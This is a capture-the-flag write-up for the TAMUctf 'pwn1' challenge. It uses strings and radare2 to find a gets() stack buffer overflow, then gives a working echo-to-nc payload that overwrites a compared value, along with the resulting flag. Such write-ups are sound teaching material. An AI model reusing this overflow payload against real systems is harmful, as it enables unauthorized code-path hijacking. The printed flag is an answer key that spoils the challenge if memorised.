Tags: radare2 overflow binary
Rating:
PWN1
nc pwn.tamuctf.com 4321
Difficulty: easy
Task has not much in the description, everything looks obvious.
There is a binary which runs remotely on pwn.tamuctf.com. Everything what comes to port 4321 it reads as input, process it and ... let's explore what it gives us as an output:
$ nc pwn.tamuctf.com 4321
Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
What... is your name?
aaa
I don't know that! Auuuuuuuugh!
Seems my answer aaa to the question What... is your name? isn't correct.
Let's check what kind of file the pwn1:
$ file pwn1
pwn1: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-, for GNU/Linux 3.2.0, BuildID[sha1]=d126d8e3812dd7aa1accb16feac888c99841f504, not stripped
It is 32-bit elf file.
We can run the pwn1 on 32-bit operation systems as is or we can run on 64-bit using the following instructions: https://askubuntu.com/questions/454253/how-to-run-32-bit-app-in-ubuntu-64-bit
Let's check what strings pwn1 file has:
$ strings pwn1
...
UWVS
[^_]
Right. Off you go.
flag.txt
Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
What... is your name?
Sir Lancelot of Camelot
I don't know that! Auuuuuuuugh!
What... is your quest?
To seek the Holy Grail.
What... is my secret?
;*2$"
GCC: (Ubuntu 7.3.0-27ubuntu1~18.04) 7.3.0
...
There is a big output. I left only important part.
Now we can try to answer to some questions:
$ nc pwn.tamuctf.com 4321
Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
What... is your name?
Sir Lancelot of Camelot
What... is your quest?
To seek the Holy Grail.
What... is my secret?
;*2$"
I don't know that! Auuuuuuuugh!
Excelent! We have answers for first two questions.
I've tried some strings as an answer to the third question - What... is my secret? - but vainly.
Time to uncover radare2:
$ r2 -b 32 -d pwn1
Process with PID 9563 started...
= attach 9563 9563
bin.baddr 0x565b6000
Using 0x565b6000
asm.bits 32
glibc.fc_offset = 0x00148
-- You can mark an offset in visual mode with the cursor and the ',' key. Later press '.' to go back
[0xf7efea20]> s main
[0x565b6779]> V
The r2 -b 32 -d pwn1 tells radare2 to debug pwn1 as 32-bit binary.
s main is radare's command: seek to the main function.
V: switch to the visual mode.
Then press p two times and you'll get something like:
Set breakpoint at the command just after the first fgets call as you can see in the above screenshoot.
To do this enter into command mode by pressing :, then type db 0x5664a7f6.
To check whether breakpoint has set type just db. To read a short help about each command in r2 type question mark after the command, e.g. db?
Then type dc (you should be in the command mode) to continue execution until breakpoint. Execution stops on fgets call. It waits for input. You'll see the first question and you can answer Sir Lancelot of Camelot:
After answering you should hit breakpoint as you see on the above screenshoot.
Let's find next fgets call by scrolling down disasm code. Set breakpoint on the command just after fgets call (to exit command mode press Enter).
Then execute binary until breakpoint again. The answer to the second question we already know from output of strings command - To seek the Holy Grail.:
Do the same: set breakpoint after third !gets call.
Actually the bug is because there is
getscall but notfgets. Last one allows you to copy exact number of bytes from inout to your variable. First one copy everything from input and if var is small it will override memory.
Execute the binary until breakpoint. Since we don't know the answer to the third question just put 50 a chars:
By pressing Enter return to visual mode:
We can see that on the above screenshot:
(1) next command is a simple comparison: dword from stack by address ebp-0x10 compares to the 0xdea110c8;
(2) next next command is jne - jump if not equal. We would like to not jump since the next is a call sym.print_flag which looks promising;
(3) also you can see a current value of the ebp registry.
What do we have by address ebp-0x10? Enter to command mode and print out a hex dump of 16 bytes located by ebp-0x10. To do it run the x 16 @ebp-0x10:
You'll see a chars. Seems we have a stack overflow
I'm not going to explain what is stack overflow, read the wiki or google by
stack buffer overflow
Since we can override stack and put whatever we want, let's put 0xdea110c8 so jne will not jump and we'll get flag.
To do it we have to calculate how many a chars (bytes) we need to put before dword 0xdea110c8.
Press c being in the visual mode and you'll jump to your stack memory. Using arrow keys go to the first a in your stack. It is a starting address. From this point until ebp-0x10 we have to fill it by any bytes, then put 4 bytes - 0xdea110c8. To get the number of bytes, or a chars, simply count bytes from first a until ebp-0x10.
The formula:
( value of ebp ) - ( 0x10 ) - ( address of first a in the stack )
In my case it is:
0xffcafd28 - 0x10 - (0xffcafce0 + 0xD)
The result is 43:
$ perl -E 'say ( (0xfff60d58 - 0x10) - (0xfff60d10 + 0xd) )'
43
It means we need 43 random bytes, let's say a, and 4 bytes 0xdea110c8.
To generate any byte you can use echo with -e switch, e.g.:
$ echo -e '\x61'
a
So, exploit should looks like:
echo -e 'Sir Lancelot of Camelot\nTo seek the Holy Grail.\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xde\xa1\x10\xc8' | nc pwn.tamuctf.com 4321
But it doesn't work:
Hm, let's run it under radare2 again, set up breakpoint just after gets call, and input answer for the third questions aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabcde.
I choosed
bcdeinstead of\xde\xa1\x10\xc8because I don't know how to input such data by hand : )
Then let's check what we have to compare:
cmp instruction has 3 bytes size, so we do +3 and print 4 bytes of code;@ebx-0x10.different byte order!
Let's modify our payload so last 4 bytes will be in reverse order:
$ echo -e 'Sir Lancelot of Camelot\nTo seek the Holy Grail.\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xc8\x10\xa1\xde' |nc pwn.tamuctf.com 4321
Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
What... is your name?
What... is your quest?
What... is my secret?
Right. Off you go.
gigem{34sy_CC428ECD75A0D392}
